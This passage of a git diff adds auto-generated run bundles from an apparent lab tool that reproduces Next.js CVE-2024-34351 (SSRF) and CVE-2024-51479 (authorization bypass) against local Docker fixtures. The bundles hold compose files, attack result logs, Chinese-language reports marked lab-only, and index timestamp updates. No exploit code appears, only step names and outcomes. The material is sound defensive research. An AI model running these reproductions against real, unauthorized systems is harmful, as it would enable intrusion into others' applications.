+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2024-34351"
+    },
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-ssrf"
+    },
+    {
+      "at": "2026-03-18T01:29:53+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:56+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:29:57+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:29:57+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2024-34351-20260318012953"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side callback reached the local sink"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:29:53+00:00",
+  "finished_at": "2026-03-18T01:29:57+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml
new file mode 100644
index 00000000..d923dab8
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: node:22-alpine
+    networks:
+    - labnet
+    ports:
+    - 18202:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/nextjs/authz-bypass/scenario.json
+      PORT: '3000'
+    command:
+    - node
+    - /workspace/00-environments/templates/fixtures/shared/node_fixture.mjs
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json
new file mode 100644
index 00000000..a59f90aa
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json
@@ -0,0 +1,68 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "server-side authorization recheck was bypassed",
+  "before": {
+    "status_code": 403,
+    "ok": false,
+    "body": {
+      "ok": false,
+      "detail": "admin boundary still enforced"
+    }
+  },
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "nextjs--CVE-2024-51479"
+    }
+  },
+  "after": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "nextjs--CVE-2024-51479"
+    }
+  },
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "server-side authorization recheck was bypassed",
+      "case_id": "nextjs--CVE-2024-51479",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "nextjs--CVE-2024-51479"
+        },
+        {
+          "event": "attack",
+          "detail": "server-side authorization recheck was bypassed"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "server-side authorization recheck was bypassed"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json
new file mode 100644
index 00000000..13cabdce
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json
@@ -0,0 +1,25 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18202/",
+      "status_code": 200,
+      "headers": {
+        "content-type": "text/html; charset=utf-8",
+        "content-length": "1005",
+        "Date": "Wed, 18 Mar 2026 01:29:16 GMT",
+        "Connection": "keep-alive",
+        "Keep-Alive": "timeout=5"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js Authz Bypass Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radi"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Next.js Authz Bypass Fixture</title>\n  <style>\n    b"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/doctor.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/doctor.json
new file mode 100644
index 00000000..75d9bf7d
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "nextjs-authz-bypass",
+          "service": "app",
+          "binding": "18202:3000",
+          "port": 18202
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "nextjs-authz-bypass"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/ready.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/ready.json
new file mode 100644
index 00000000..4dbb08e6
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18202/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/seed.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/seed.json
new file mode 100644
index 00000000..ad4c3ee3
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "nextjs--CVE-2024-51479"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html
new file mode 100644
index 00000000..7824f171
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html
@@ -0,0 +1,45 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 nextjs-nextjs--CVE-2024-51479-20260318012913</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>nextjs--CVE-2024-51479</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>nextjs-authz-bypass</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:29:13+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>nextjs--CVE-2024-51479</td></tr>
+<tr><td><code>2026-03-18T01:29:13+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>nextjs-authz-bypass</td></tr>
+<tr><td><code>2026-03-18T01:29:13+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:29:16+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:29:17+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:29:17+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>nextjs-nextjs--CVE-2024-51479-20260318012913</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>nextjs.authz-bypass</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md
new file mode 100644
index 00000000..a090579a
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md
@@ -0,0 +1,66 @@
+# 运行 nextjs-nextjs--CVE-2024-51479-20260318012913
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `nextjs--CVE-2024-51479`
+- 系统: `nextjs`
+- Repro Profile: `nextjs-authz-bypass`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:29:13+00:00`
+- 完成时间: `2026-03-18T01:29:17+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:29:13+00:00` | `select-advisory` | `completed` | nextjs--CVE-2024-51479 |
+| `2026-03-18T01:29:13+00:00` | `resolve-repro-profile` | `completed` | nextjs-authz-bypass |
+| `2026-03-18T01:29:13+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:29:16+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:29:16+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:29:16+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:29:16+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:29:16+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:29:16+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:29:17+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:29:17+00:00` | `update-registry-and-reports` | `completed` | nextjs-nextjs--CVE-2024-51479-20260318012913 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `nextjs.authz-bypass` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `0`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json
new file mode 100644
index 00000000..13ad88f9
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/run.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "nextjs-nextjs--CVE-2024-51479-20260318012913",
+  "system_id": "nextjs",
+  "advisory_id": "nextjs--CVE-2024-51479",
+  "repro_profile_id": "nextjs-authz-bypass",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "nextjs.authz-bypass",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "nextjs--CVE-2024-51479"
+    },
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "nextjs-authz-bypass"
+    },
+    {
+      "at": "2026-03-18T01:29:13+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:29:16+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:29:17+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:29:17+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "nextjs-nextjs--CVE-2024-51479-20260318012913"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side authorization recheck was bypassed"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:29:13+00:00",
+  "finished_at": "2026-03-18T01:29:17+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/07-framework-security/cms/directus/INDEX.md b/07-framework-security/cms/directus/INDEX.md
index 9cd5bef7..13c3343d 100644
--- a/07-framework-security/cms/directus/INDEX.md
+++ b/07-framework-security/cms/directus/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/discourse/INDEX.md b/07-framework-security/cms/discourse/INDEX.md
index f74c85d3..27bbda7b 100644
--- a/07-framework-security/cms/discourse/INDEX.md
+++ b/07-framework-security/cms/discourse/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/drupal/INDEX.md b/07-framework-security/cms/drupal/INDEX.md
index da9fc6b8..158d04dd 100644
--- a/07-framework-security/cms/drupal/INDEX.md
+++ b/07-framework-security/cms/drupal/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/ghost/INDEX.md b/07-framework-security/cms/ghost/INDEX.md
index 732e566e..da560caa 100644
--- a/07-framework-security/cms/ghost/INDEX.md
+++ b/07-framework-security/cms/ghost/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/joomla/INDEX.md b/07-framework-security/cms/joomla/INDEX.md
index b005d794..19745c29 100644
--- a/07-framework-security/cms/joomla/INDEX.md
+++ b/07-framework-security/cms/joomla/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/mediawiki/INDEX.md b/07-framework-security/cms/mediawiki/INDEX.md
index 4007978a..9cbc9626 100644
--- a/07-framework-security/cms/mediawiki/INDEX.md
+++ b/07-framework-security/cms/mediawiki/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/moodle/INDEX.md b/07-framework-security/cms/moodle/INDEX.md
index f4f7c400..c5e674c6 100644
--- a/07-framework-security/cms/moodle/INDEX.md
+++ b/07-framework-security/cms/moodle/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/strapi/INDEX.md b/07-framework-security/cms/strapi/INDEX.md
index e9fbf472..0548b49f 100644
--- a/07-framework-security/cms/strapi/INDEX.md
+++ b/07-framework-security/cms/strapi/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/cms/wordpress/INDEX.md b/07-framework-security/cms/wordpress/INDEX.md
index 46e9f17f..4710e943 100644
--- a/07-framework-security/cms/wordpress/INDEX.md
+++ b/07-framework-security/cms/wordpress/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/adobe-commerce/INDEX.md b/07-framework-security/ecommerce/adobe-commerce/INDEX.md
index df3b590e..1c2f71e2 100644
--- a/07-framework-security/ecommerce/adobe-commerce/INDEX.md
+++ b/07-framework-security/ecommerce/adobe-commerce/INDEX.md
@@ -12,7 +12,7 @@
 - 已实证(synthetic): `0`
 - 阻塞数: `0`
 - 待人工/缺浏览器证据: `0`
-- 最近渲染时间: `2026-03-17T12:57:11+00:00`
+- 最近渲染时间: `2026-03-18T01:29:31+00:00`
 
 ## 目标约束
 
diff --git a/07-framework-security/ecommerce/magento-open-source/INDEX.md b/07-framework-security/ecommerce/magento-open-source/INDEX.md
index 32f97158..3dd7fe15 100644
--- a/07-framework-security/ecommerce/magento-open-source/INDEX.md
+++ b/07-framework-security/ecommerce/magento-open-source/INDEX.md
@@ -12,7 +12,7 @@
